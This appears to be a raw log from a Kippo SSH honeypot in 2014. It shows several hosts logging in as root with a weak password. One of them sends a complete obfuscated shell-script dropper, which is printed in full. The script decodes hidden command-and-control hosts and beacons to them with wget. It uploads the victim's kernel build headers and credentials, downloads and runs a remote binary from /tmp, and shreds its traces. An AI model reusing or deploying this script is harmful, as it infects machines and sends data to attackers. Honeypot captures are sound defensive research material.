Ancora_Log_Kippo

1. 2014-12-11 15:39:09+0000 [SSH19077,104.149.220.27] root trying auth password
2. 2014-12-11 15:39:09+0000 [SSH,19077,104.149.220.27] login attempt [root/123456] succeeded
3. 2014-12-11 15:39:09+0000 [SSH,19077,104.149.220.27] root authenticated with password
4. 2014-12-11 15:39:09+0000 [SSH,19077,104.149.220.27] starting service ssh-connection
5. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] root trying auth none
6. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] root trying auth none
7. 2014-12-11 15:39:09+0000 [SSH,19077,104.149.220.27] got channel session request
8. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19077,104.149.220.27] channel open
9. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] root trying auth password
10. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] login attempt [root/123456] succeeded
11. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] root authenticated with password
12. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] starting service ssh-connection
13. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] root trying auth password
14. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] login attempt [root/123456] succeeded
15. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] root authenticated with password
16. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] starting service ssh-connection
17. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19077,104.149.220.27] executing command "__host_32__="sEEA+==deadefadcajc+jjjj"
18. __host_64__="sEEA+==deadefadcaih+jjjj"
19.  
20. __host_32_2__="sEEA+==cbeadgakaddh+jjjj"
21. __host_64_2__="sEEA+==cbeadgakaddg+jjjj"
22.  
23. __host_32_libc__="sEEA+==cbeadgakaddh+jjjj"
24. __host_64_libc__="sEEA+==cbeadgakaddg+jjjj"
25.  
26. __download_url__="sEEA+==deadefahbacfb=tyDElww=jbbj"
27.  
28. __remote__="cbeadgakadfg+jbbj|cbeadfbacfcagb+jbbj|hhacbdadgeaeb+jbbj|yoyDaoDludlcazCr+jbbj|yoyDaoDludlazCr+jbbj|yoyDasnItlzlzanzx+jbbj|yoyDaoDludlanzx+jbbj"
29.  
30.  
31. __username__='loxty'
32. __password__='admin'
33.  
34. __temp__=/tmp
35. __install_dir__=/usr/local/bin
36. __kernel__=`uname -r|awk -F- '{print $1}'`
37.  
38. # select compiler server
39. server(){
40. __osv_X86_64=`dec 'Ijh_hf'`
41. __osv_AMD64=`dec 'LXOhf'`
42. __os_version_X86_64=`uname -a|grep "$__osv_X86_64"`
43. __os_version_AMD64=`uname -a|grep "$__osv_AMD64"`
44. if [ -f /lib/libc.so.6 ]; then
45. __libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'`
46. __libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'`
47. fi
48.  
49. if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then
50. __online=`wget "$__host_64__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
51. if [ ! -z "$__online" ]; then #
52. __host__=$__host_64__
53. else
54. __host__=$__host_64_2__
55. fi
56.  
57. if [ -f /lib/libc.so.6 ]; then
58. if [ $__libc_main -le 2 ]; then
59. if [ $__libc_sub -le 5 ]; then
60. __host__=$__host_64_libc__
61. fi
62. fi
63. fi
64. else
65. __online=`wget "$__host_32__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
66. if [ ! -z "$__online" ]; then #
67. __host__=$__host_32__
68. else
69. __host__=$__host_32_2__
70. fi
71.  
72. if [ -f /lib/libc.so.6 ]; then
73. if [ $__libc_main -le 2 ]; then
74. if [ $__libc_sub -le 5 ]; then
75. __host__=$__host_32_libc__
76. fi
77. fi
78. fi
79. fi
80. }
81.  
82. # check md5
83. md5(){
84. __data=`echo "$@"`
85. echo -n "$__data"|md5sum|cut -d ' ' -f1
86. return 0
87. }
88.  
89. # get os version
90. version(){
91. if [ -f /sbin/modinfo ]; then
92. SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '`
93. echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`"
94. fi
95. return 0
96. }
97.  
98. checkBuild(){
99. __build=/lib/modules/`uname -r`/build/
100. if [ -d $__build ]; then
101. return 1
102. fi
103. return 0
104. }
105.  
106. # generate header file
107. generate(){
108. __files=`ls $__build`
109. tar zcfhP "$__temp__/dev.tgz" -C $__build $__files
110. if [ $? -eq 0 ] ;then
111. return 1
112. fi
113. return 0
114. }
115.  
116. # check header version
117. check(){
118. __iid=`echo "$@"`
119. if [ ! -z "$__iid" ]; then
120. __result=`wget "$__host__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q`
121. if [ ! -z "$__result" ]; then
122. __code=`echo $__result|awk -F "|" '{print $1}'`
123. __md5=`echo $__result|awk -F "|" '{print $2}'`
124. if [ $__code -eq 1001 ]; then
125. return 1
126. fi
127. fi
128. fi
129. return 0
130. }
131.  
132. # download build file
133. download(){
134. __iid=`echo "$@"`
135. if [ ! -z "$__iid" ]; then
136. __url="$__host__/upload/module/$__iid/build.tgz"
137. wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3
138. if [ $? -eq 0 ];then #
139. return 1
140. fi
141. fi
142. return 0
143. }
144.  
145. download_and_execute(){
146. wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3
147. if [ $? -eq 0 ];then #
148. chmod +x /tmp/bin
149. /tmp/bin
150. sleep 3
151. rm -rf /tmp/bin
152. return 1
153. fi
154. return 0
155. }
156.  
157. # remote compiler code
158. compiler(){
159. __iid=`echo "$@"`
160. if [ ! -z "$__iid" ]; then
161. __url="$__host__/compiler.action?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__"
162. __result=`wget "$__url" -O - -q --connect-timeout=3 -t 3`
163. if [ ! -z "$__result" ]; then
164. __code=`echo $__result|awk -F "|" '{print $1}'`
165. __md5=`echo $__result|awk -F "|" '{print $2}'`
166. if [ $__code -eq 1001 ]; then
167. return 1
168. fi
169. fi
170. fi
171. return 0
172. }
173.  
174. # uncompress file
175. uncompress(){
176. __iid=`echo "$@"`
177. if [ ! -z "$__iid" ]; then
178. if [ ! -d $__temp__/$__iid ]; then
179. mkdir $__temp__/$__iid
180. fi
181. tar zxvf $__temp__/build.tgz -C $__temp__/$__iid
182. if [ $? -eq 0 ] ;then
183. shred -u -z $__temp__/build.tgz
184. return 1
185. fi
186. fi
187. return 0
188. }
189. enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; }
190. dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; }
191.  
192. # install file
193. setup(){
194. __iid=`echo "$@"`
195. if [ ! -z "$__iid" ]; then
196. __bin=`echo "bin"`
197. chmod +x $__temp__/$__iid/$__bin
198. $__temp__/$__iid/$__bin
199. if [ $? -eq 0 ]; then
200. sleep 3
201. rm -rf $__temp__/$__iid/$__bin
202. return 1
203. fi
204. fi
205. return 0
206.  
207. }
208.  
209.  
210. # upload
211. upload(){
212. rm -f /tmp/mini
213. wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3
214. if [ $? -eq 0 ];then #
215. chmod +x /tmp/mini
216. __url=$__host__/submit.action
217. __result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"`
218. if [ ! -z "$__result" ]; then
219. __code=`echo $__result|awk -F "|" '{print $1}'`
220. __md5=`echo $__result|awk -F "|" '{print $2}'`
221. if [ $__code -eq 1001 ]; then
222. rm -f /tmp/mini
223. return 1
224. fi
225. fi
226. rm -f /tmp/mini
227. fi
228. return 0
229. }
230.  
231.  
232.  
233. # main entry
234. main(){
235. PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
236. __host_32__=`dec "$__host_32__"`
237. __host_64__=`dec "$__host_64__"`
238. __host_32_2__=`dec "$__host_32_2__"`
239. __host_64_2__=`dec "$__host_64_2__"`
240. __host_32_libc__=`dec "$__host_32_libc__"`
241. __host_64_libc__=`dec "$__host_64_libc__"`
242. __download_url__=`dec "$__download_url__"`
243. __remote__=`dec "$__remote__"`
244. __username__=`dec "$__username__"`
245. __version__=`version`
246. __iid=`md5 "$__version__"`
247. __iid=`echo $__iid|tr [:lower:] [:upper:]`
248. __done=0
249.  
250. if [ ! -d /tmp ]; then
251. mkdir /tmp
252. fi
253.  
254. if [ -f /usr/bin/wget ]; then
255. chattr -i /usr/bin/wget
256. chmod +x /usr/bin/wget
257. fi
258.  
259. if [ -f /bin/wget ]; then
260. chattr -i /bin/wget
261. chmod +x /bin/wget
262. fi
263.  
264. if [ -f /usr/bin/cut ]; then
265. chattr -i /usr/bin/cut
266. chmod +x /usr/bin/cut
267. fi
268.  
269. if [ -f /bin/cut ]; then
270. chattr -i /bin/cut
271. chmod +x /bin/cut
272. fi
273.  
274. server # select http server
275. check $__iid
276. if [ $? -eq 1 ];then
277. compiler $__iid # remote compiler
278. if [ $? -eq 1 ]; then
279. __done=1
280. fi
281. else
282. checkBuild
283. if [ $? -eq 1 ];then
284. generate # create header file
285. if [ $? -eq 1 ]; then
286. upload
287. if [ $? -eq 1 ] ;then
288. __done=1
289. fi
290. rm -rf $__temp__/dev.tgz
291. else
292. if [ -f $__temp__/dev.tgz ]; then
293. rm -rf $__temp__/dev.tgz
294. fi
295. compiler $__iid # remote compiler
296. if [ $? -eq 1 ]; then
297. __done=1
298. fi
299. fi
300. else
301. compiler $__iid # remote compiler
302. if [ $? -eq 1 ]; then
303. __done=1
304. fi
305. fi
306. fi
307.  
308. if [ $__done -eq 1 ]; then
309. download $__iid
310. if [ $? -eq 1 ]; then
311. uncompress $__iid
312. if [ $? -eq 1 ]; then
313. setup $__iid
314. if [ $? -ne 1 ]; then
315. __done=0
316. fi
317. else
318. __done=0
319. fi
320. else
321. __done=0
322. fi
323. fi
324.  
325. if [ $__done -eq 0 ]; then
326. download_and_execute
327. fi
328. rm -rf $__temp__/$__iid
329. }
330.  
331. main
332. ls -la /var/run/mount.pid
333. exit $?
334. "
335. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19077,104.149.220.27] Unhandled Error
336. Traceback (most recent call last):
337. File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
338. return context.call({ILogContext: newCtx}, func, *args, **kw)
339. File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
340. return self.currentContext().callWithContext(ctx, func, *args, **kw)
341. File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
342. return func(*args,**kw)
343. File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/channel.py", line 137, in requestReceived
344. return f(data)
345. --- <exception caught here> ---
346. File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/session.py", line 68, in request_exec
347. self.session.execCommand(pp, f)
348. File "/home/honey/kippo-0.8/kippo/core/honeypot.py", line 464, in execCommand
349. raise NotImplementedError
350. exceptions.NotImplementedError:
351.  
352. 2014-12-11 15:39:09+0000 [SSH,19078,23.228.196.60] got channel session request
353. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19078,23.228.196.60] channel open
354. 2014-12-11 15:39:09+0000 [SSH,19079,107.160.48.7] got channel session request
355. 2014-12-11 15:39:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19079,107.160.48.7] channel open
356. 2014-12-11 15:39:10+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,19078,23.228.196.60]